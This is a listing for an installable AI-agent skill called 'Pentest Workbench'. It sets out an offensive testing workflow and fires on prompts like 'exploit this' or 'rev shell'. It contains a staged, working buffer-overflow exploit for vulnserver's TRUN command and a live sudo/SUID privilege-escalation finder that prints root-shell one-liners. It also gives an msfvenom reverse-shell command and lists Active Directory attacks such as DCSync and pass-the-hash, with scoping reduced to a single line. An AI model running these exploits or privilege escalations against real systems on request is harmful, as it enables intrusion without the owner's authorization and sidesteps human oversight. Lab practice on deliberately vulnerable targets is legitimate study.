Pentest Workbench

Dev Tools

Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testing, analyzing vulnerable targets, conducting privilege escalation, building exploits, or running reconnaissance. Covers: TCP buffer overflows (vulnserver), web application testing (VulnerableWordpress/WPScan), honeypot analysis (Cowrie), GTFOBins/LOLBAS privesc, pwn.college fundamentals, and offensive toolchain automation. Triggers on: run a pentest, exploit this, buffer overflow, privesc, OSCP, CTF, bug bounty, vulnerability assessment, rev shell, test this target.

Install

openclaw skills install pentest-workbench

Pentest Workbench

Quick Start

  1. Define scope — target, rules of engagement, goals
  2. Recon — passive OSINT, network enumeration
  3. Identify — find vulnerabilities, misconfigs, weak points
  4. Exploit — leverage findings with appropriate technique
  5. Document — record steps, evidence, impact, remediation

Core Workflow

Phase 1: Recon & Enumeration

  • Active network enumeration: nmap, masscan, rustscan for port discovery
  • Passive OSINT: subdomain enumeration, WHOIS, Shodan, Censys, Google dorking
  • Web recon: DirBuster, ffuf, Burp Suite crawler
  • For deliberately vulnerable targets: probe the service by hand with netcat before scripting anything

Tools from linked repos:

  • netstalking-osint — automated OSINT recon workflows
  • Pentest-Tools (40+ categories) — scanner/framework discovery, network_enum
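
The port-discovery step above usually ends with an nmap run whose results feed every later phase. The following script is an added example (not part of the skill, the linked repos or nmap) that parses nmap's greppable `-oG` output into a per-host list of open services and turns it into a follow-up checklist built from the tools this workflow already names. `SAMPLE_GNMAP` is a constructed record in the real `-oG` format, not output from a real target; the `FOLLOW_UP` hints are the editor's mapping, not nmap's.

```python
"""Turn nmap's greppable (-oG) output into a per-host list of open services
and a follow-up checklist built from the tools this workflow already names.

Added example, not part of the skill or of nmap. SAMPLE_GNMAP is a constructed
scan record in -oG format, not output from a real target.
"""
import re
from collections import defaultdict

# Constructed sample: the shape `nmap -sCV -p- -oG scan.gnmap 10.0.0.0/29` writes.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sCV -p- -oG scan.gnmap 10.0.0.0/29
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, 443/closed/tcp//https///\tIgnored State: filtered (65532)
Host: 10.0.0.6 ()\tStatus: Up
Host: 10.0.0.6 ()\tPorts: 445/open/tcp//microsoft-ds//Windows 7 - 10 microsoft-ds/, 9999/open/tcp//abyss?///\tIgnored State: closed (65533)
# Nmap done -- 8 IP addresses (2 hosts up) scanned
"""

# Follow-up hints keyed on nmap's service name; mirrors the workflow's own tool list.
FOLLOW_UP = {
    "http":          "ffuf/DirBuster for content, WPScan if it is WordPress, then Burp",
    "https":         "same as http, plus TLS configuration check",
    "ssh":           "banner/version check; credential reuse only inside the agreed scope",
    "microsoft-ds":  "cme smb <target> -u user -p pass (shares, signing, sessions)",
    "ms-wbt-server": "RDP: NLA check, credential reuse",
}
MANUAL_PROBE = "unknown/unfingerprinted service: probe by hand with nc before scripting"


def parse_gnmap(text):
    """Return {ip: [ {port, proto, service, version}, ... ]} for open ports only."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        m = re.match(r"Host:\s+(\S+)", line)
        if not m:
            continue                          # comment lines and blanks
        ip = m.group(1)
        hosts.setdefault(ip, [])              # register host even before its Ports line
        pm = re.search(r"Ports:\s+([^\t]+)", line)
        if not pm:
            continue
        for entry in pm.group(1).split(", "):
            # Field layout in -oG: port/state/proto/owner/service/rpc/version/
            f = entry.split("/")
            if len(f) < 7 or f[1] != "open":
                continue
            hosts[ip].append({"port": int(f[0]), "proto": f[2],
                              "service": f[4], "version": f[6]})
    return dict(hosts)


def next_steps(hosts):
    """(ip, port, hint) per open service; nmap marks a guessed service with a trailing '?'."""
    steps = []
    for ip, services in hosts.items():
        for s in services:
            guessed = s["service"].endswith("?")
            hint = MANUAL_PROBE if guessed else FOLLOW_UP.get(s["service"], MANUAL_PROBE)
            steps.append((ip, s["port"], hint))
    return steps


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    for ip, port, hint in next_steps(parse_gnmap(data)):
        print(f"{ip}:{port}\t{hint}")
```

Run it as `python recon_triage.py scan.gnmap`; with no argument it triages the constructed sample. Closed and filtered ports are dropped on purpose, and a service nmap could only guess (the `?` suffix, as on the 9999/tcp entry) is routed to manual netcat probing rather than to an automated tool.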

Phase 2: Vulnerability Analysis

  • Web: WPScan for WordPress, sqlmap for SQLi, Burp for auth bypass
  • Network: nmap NSE scripts, Metasploit, searchsploit
  • Binary: IDA/Ghidra for RE, checksec for mitigations
  • Config reviews: weak permissions, default creds, exposed secrets

Phase 3: Exploitation

Buffer Overflow (vulnserver pattern):

  1. Send oversized input (a cyclic pattern) to crash the service and locate the crash point
  2. Measure the offset to EIP from the pattern and confirm control with a marker value
  3. Identify bad characters the target strips or transforms
  4. Find a stable jump (JMP ESP / CALL ESP) in a module without ASLR or rebasing
  5. Generate shellcode (msfvenom / custom) that excludes those bad characters, prepend a NOP sled, and send

Web:

  • SQLi → sqlmap or manual union/boolean
  • XSS → BeEF / XSS Hunter
  • RCE → reverse shell via pentest-tools

Privesc (GTFOBins):

# Check sudo rights and SUID binaries
sudo -l
find / -perm -4000 -type f 2>/dev/null

# Shell escape from vi/vim when it runs with elevated rights (e.g. sudo vim)
:!/bin/bash
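
The two commands above produce text; the tedious part is cross-referencing every binary they list against GTFOBins. The script below is an added example (not part of the skill and not GTFOBins' own code) that parses `sudo -l` output and a SUID list and reports the matching escape one-liners. `SAMPLE_SUDO_L` and `SAMPLE_SUID` are constructed transcripts in the real output formats of sudo and find(1); `GTFOBINS` is a small hand-picked excerpt of public GTFOBins entries, so a miss here is not a clean bill of health.

```python
"""Cross-reference `sudo -l` rules and SUID binaries with a GTFOBins excerpt.

Added example, not part of the skill and not GTFOBins' own code. SAMPLE_SUDO_L
and SAMPLE_SUID are constructed transcripts; GTFOBINS is an excerpt, not the
full catalogue.
"""
import os
import re
import subprocess

# Constructed `sudo -l` transcript for a user "bob" on a host "target".
SAMPLE_SUDO_L = """\
Matching Defaults entries for bob on target:
    env_reset, mail_badpass

User bob may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/find
    (ALL : ALL) /usr/sbin/service apache2 restart
"""

# Constructed `find / -perm -4000 -type f 2>/dev/null` output.
SAMPLE_SUID = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/find
/usr/local/bin/python3
"""

# Excerpt of GTFOBins one-liners for the sudo and SUID contexts (None = not in this excerpt).
GTFOBINS = {
    "vim":    {"sudo": "sudo vim -c ':!/bin/sh'", "suid": None},
    "find":   {"sudo": r"sudo find . -exec /bin/sh \; -quit",
               "suid": r"./find . -exec /bin/sh -p \; -quit"},
    "less":   {"sudo": "sudo less /etc/profile   (then type !/bin/sh)", "suid": None},
    "awk":    {"sudo": "sudo awk 'BEGIN {system(\"/bin/sh\")}'", "suid": None},
    "python": {"sudo": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
               "suid": "./python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"},
    "bash":   {"sudo": "sudo bash", "suid": "./bash -p"},
}

# "(runas) [NOPASSWD:] /path/to/cmd [fixed args]"
SUDO_RULE = re.compile(r"^\s*\(([^)]+)\)\s*(NOPASSWD:\s*)?(\S+)\s*(.*)$")


def canonical(name):
    """vim.basic -> vim, python3.11 -> python: GTFOBins keys the base program name."""
    return re.sub(r"\d+$", "", name.split(".")[0])


def parse_sudo_l(text):
    """Rules after the 'User X may run ...' header: runas, NOPASSWD flag, command, fixed args."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        m = SUDO_RULE.match(line) if in_rules else None
        if m:
            rules.append({"runas": m.group(1), "nopasswd": bool(m.group(2)),
                          "cmd": m.group(3), "args": m.group(4).strip()})
    return rules


def parse_suid_list(text):
    return [l.strip() for l in text.splitlines() if l.strip().startswith("/")]


def assess(rules, suid_paths):
    """Findings as (context, path, escape). Rules that pin arguments are skipped:
    a fixed argument list normally blocks the GTFOBins one-liner."""
    findings = []
    for r in rules:
        entry = GTFOBINS.get(canonical(os.path.basename(r["cmd"])))
        if entry and entry["sudo"] and not r["args"]:
            findings.append(("sudo", r["cmd"], entry["sudo"]))
    for path in suid_paths:
        name = canonical(os.path.basename(path))
        entry = GTFOBINS.get(name)
        if entry and entry["suid"]:
            findings.append(("suid", path, entry["suid"].replace("./" + name, path, 1)))
    return findings


def collect_live():
    """Run both enumeration commands on the current host (non-interactive sudo)."""
    sudo_out = subprocess.run(["sudo", "-n", "-l"], stdout=subprocess.PIPE,
                              stderr=subprocess.DEVNULL, text=True).stdout
    suid_out = subprocess.run(["find", "/", "-perm", "-4000", "-type", "f"],
                              stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True).stdout
    return sudo_out, suid_out


if __name__ == "__main__":
    try:
        sudo_out, suid_out = collect_live()
    except FileNotFoundError:            # no sudo binary here: fall back to the constructed samples
        sudo_out, suid_out = SAMPLE_SUDO_L, SAMPLE_SUID
    for ctx, path, escape in assess(parse_sudo_l(sudo_out), parse_suid_list(suid_out)):
        print(f"[{ctx}] {path}\n    {escape}")
```

The `service apache2 restart` rule is deliberately not reported: sudo rules with fixed arguments do not let you substitute the GTFOBins invocation, and a finding there would be noise. Extend `GTFOBINS` from the live site before relying on the output.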

AD Attacks (Pentest-Tools):

  • Kerberoasting, AS-REP roasting, SMB relay
  • BloodHound/SharpHound enumeration → Golden Ticket / DCSync

Phase 4: Post-Exploitation

  • Cowrie honeypot: analyze attacker sessions for TTPs
  • Privilege escalation: kernel exploits, sudo abuse, service misconfigs
  • Persistence: scheduled tasks, services, SSH keys
  • Lateral movement: PsExec, WMI, SMB, Pass-the-Hash

Phase 5: Documentation

  • Steps reproducible by another tester
  • Evidence: screenshots, packet captures, log output
  • Impact: CVSS score, business risk
  • Remediation: specific, actionable fixes

Key References

  • Binary exploitation: See references/buffer-overflow.md (vulnserver anatomy, exploit dev)
  • Privesc: See references/privesc.md (GTFOBins/LOLBAS, Linux/Windows escalation)
  • Tool inventory: See references/tools-inventory.md (all linked tools catalogued)
  • pwn.college: CTF exercises for memory corruption, ROP, kernel fundamentals

Exploit Dev (vulnserver)

Vulnserver runs on port 9999. Vulnerable commands:

Command | Trigger Function | Buffer Size | Overflow Offset
TRUN    | Function3        | 2000        | ~2003 (EIP at ~2007)
GMON    | Function3        | 2000        | Similar to TRUN
KSTET   | Function2        | 60          | ~64
GTER    | Function1        | 140         | ~144
LTER    | Function3        | 2000        | Via transformation
HTER    | Function4        | 1000        | Hex-encoded

Key insight: essfunc.dll EssentialFunc10-14 also use strcpy into small buffers (140, 60, 2000, 2000, 1000).

Exploit strategy:

  1. Find offset with pattern_create / mona.py
  2. Confirm EIP control
  3. Locate or craft a ROP chain if ASLR/DEP present
  4. Generate alphanumeric shellcode if bad chars restrict ASCII
  5. Use egghunter if space is small
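
The Phase 3 buffer-overflow steps and the exploit strategy above are the same procedure; the script below is an added example (not from the skill's references or from vulnserver) that carries the TRUN case through it: a pattern_create/pattern_offset equivalent in pure Python, a bad-character probe, and the final JMP ESP payload. Assumptions: the usual `TRUN /.:/` prefix (TRUN only reaches its strcpy when a `.` is present), `JMP_ESP` is a placeholder to replace with the address mona.py reports for essfunc.dll in your own VM, and `SHELLCODE` is a placeholder INT3 run rather than msfvenom output.

```python
"""vulnserver TRUN exploit built stage by stage: cyclic pattern for the crash,
EIP offset recovery, bad-character probe, then the final JMP ESP payload.

Added example, not from the skill's references or from vulnserver.
"""
import socket
import string
import struct

PREFIX = b"TRUN /.:/"         # the '.' is what makes TRUN call its strcpy-based function
JMP_ESP = 0x625011AF          # placeholder: take the real one from `!mona jmp -r esp`
SHELLCODE = b"\xcc" * 8       # placeholder: msfvenom output generated with -b for the bad chars
BADCHARS = (0x00,)            # typical TRUN finding; confirm with badchar_probe() on your VM


def cyclic(length):
    """pattern_create equivalent: Aa0Aa1Aa2...; 4-byte windows are unique within 20280 bytes."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes would repeat")


def cyclic_find(eip_value):
    """pattern_offset equivalent: the debugger shows EIP little-endian, 0x41326141 -> b'Aa2A'."""
    return cyclic(20280).find(struct.pack("<I", eip_value))


def badchar_probe(exclude=BADCHARS):
    """Every byte value except the ones already known bad; diff the stack copy against this."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def check_badchars(data, badchars=BADCHARS):
    """Sorted list of forbidden byte values present in data (empty means safe to send)."""
    return sorted(b for b in badchars if b in data)


def build_payload(offset, jmp_esp=JMP_ESP, shellcode=SHELLCODE, badchars=BADCHARS,
                  nops=16, total=3000):
    """Filler up to EIP, JMP ESP address, NOP sled, shellcode, padded to a fixed length.
    `offset` counts from the first byte after PREFIX, the same way cyclic_find() does."""
    bad = check_badchars(shellcode, badchars)
    if bad:
        raise ValueError("shellcode contains bad chars: " + ", ".join(hex(b) for b in bad))
    body = b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nops + shellcode
    if len(body) > total:
        raise ValueError("payload exceeds the length the crash was found with")
    return PREFIX + body + b"C" * (total - len(body))


def send_stage(data, host="127.0.0.1", port=9999, timeout=3):
    """One TRUN transaction: read the banner, send the stage, return whatever comes back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)
        s.sendall(data + b"\r\n")
        try:
            return s.recv(1024)
        except OSError:                 # timeout or reset: expected once the service crashes
            return b""


if __name__ == "__main__":
    import sys
    stage = sys.argv[1] if len(sys.argv) > 1 else "crash"
    if stage == "crash":            # steps 1-2: send the pattern, read EIP in the debugger
        send_stage(PREFIX + cyclic(3000))
    elif stage == "offset":         # step 2: python exploit.py offset 0x386F4337
        print(cyclic_find(int(sys.argv[2], 16)))
    elif stage == "badchars":       # step 3: compare the memory at ESP with badchar_probe()
        send_stage(PREFIX + b"A" * 2003 + b"BBBB" + badchar_probe())
    else:                           # steps 4-5: python exploit.py exploit
        send_stage(build_payload(2003))
```

Run the stages in order against a lab VM with the service under a debugger. With the pattern sent after `TRUN /.:/`, EIP comes back as 0x386F4337, and `cyclic_find` maps that to offset 2003, which is what the table above lists for TRUN; `build_payload` then refuses to send shellcode that still contains a byte from the bad-character list.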

Tool Quick Ref

Tool         | Purpose       | Key Command
nmap         | Port enum     | nmap -sCV -p- -T4 target
Burp Suite   | Web testing   | Proxy, Repeater, Intruder
sqlmap       | SQL injection | sqlmap -r req.txt --batch
msfvenom     | Shellcode gen | msfvenom -p linux/x64/shell_reverse_tcp LHOST=x LPORT=y -f raw
CrackMapExec | AD attacks    | cme smb target -u user -p pass
Evil-WinRM   | Remote shell  | evil-winrm -i target -u user -p pass

Mindset

  • Methodical > flashy — good recon beats brute force
  • Always document as you go — screenshot everything
  • Understand the payload — not just "it works"
  • Think like a defender — what would stop this attack?